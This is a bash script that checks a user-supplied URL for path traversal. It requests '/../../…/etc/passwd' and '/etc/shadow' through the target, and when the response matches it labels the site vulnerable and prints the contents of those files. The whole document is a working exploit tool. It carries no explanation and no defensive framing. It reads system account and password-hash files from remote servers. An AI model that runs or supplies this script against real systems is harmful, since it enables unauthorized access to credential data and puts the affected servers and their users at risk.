#!/bin/bash

GREEN='\033[0;32m'
YELLOW='\033[0;33m'
RED='\033[0;31m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
WHITE='\033[0;37m'
MAGENTA='\033[0;35m'
NC='\033[0m'

date_time=$(date +"%H:%M:%S")
url="$1"
echo -e "${WHITE}[${YELLOW}$date_time${WHITE}] ${WHITE}[${CYAN}INFO${WHITE}] ${WHITE}[${YELLOW}CHECKING${WHITE}] ${GREEN}$url"
echo ""
exploit_payload_passwd=("/../../../../../../../../../../../../../etc/passwd")
exploit_passwd=$(GET "$url${exploit_payload_passwd[@]}" 2>/dev/null)
if [[ "$exploit_passwd" == *":/"* ]]; then
	echo -e "${WHITE}[${YELLOW}$date_time${WHITE}] ${WHITE}[${CYAN}INFO${WHITE}] ${WHITE}[${MAGENTA}VULNERABLE${WHITE}] ${GREEN}$url${MAGENTA}$exploit_payload_passwd"
	echo -e "${WHITE}[${YELLOW}$date_time${WHITE}] ${WHITE}[${CYAN}INFO${WHITE}] ${WHITE}[${MAGENTA}EXPLOITING${WHITE}] ${GREEN}$url${MAGENTA}$exploit_payload_passwd"
	sleep 2
	echo ""
	echo -e "${WHITE}$exploit_passwd"
	echo ""
else
	echo -e "${WHITE}[${YELLOW}$date_time${WHITE}] ${WHITE}[${CYAN}INFO${WHITE}] ${WHITE}[${RED}NOT-VULNERABLE${WHITE}] ${GREEN}$url"
fi

exploit_payload_shadow=("/../../../../../../../../../../../../../etc/shadow")
exploit_shadow=$(GET "$url${exploit_payload_shadow[@]}" 2>/dev/null)
if [[ "$exploit_shadow" == *":"* ]]; then
	echo -e "${WHITE}[${YELLOW}$date_time${WHITE}] ${WHITE}[${CYAN}INFO${WHITE}] ${WHITE}[${MAGENTA}VULNERABLE${WHITE}] ${GREEN}$url${MAGENTA}$exploit_payload_shadow"
	echo -e "${WHITE}[${YELLOW}$date_time${WHITE}] ${WHITE}[${CYAN}INFO${WHITE}] ${WHITE}[${MAGENTA}EXPLOITING${WHITE}] ${GREEN}$url${MAGENTA}$exploit_payload_shadow"
	sleep 2
	echo ""
	echo -e "${WHITE}$exploit_shadow"
	echo ""
else
	echo -e "${WHITE}[${YELLOW}$date_time${WHITE}] ${WHITE}[${CYAN}INFO${WHITE}] ${WHITE}[${RED}NOT-VULNERABLE${WHITE}] ${GREEN}$url"
fi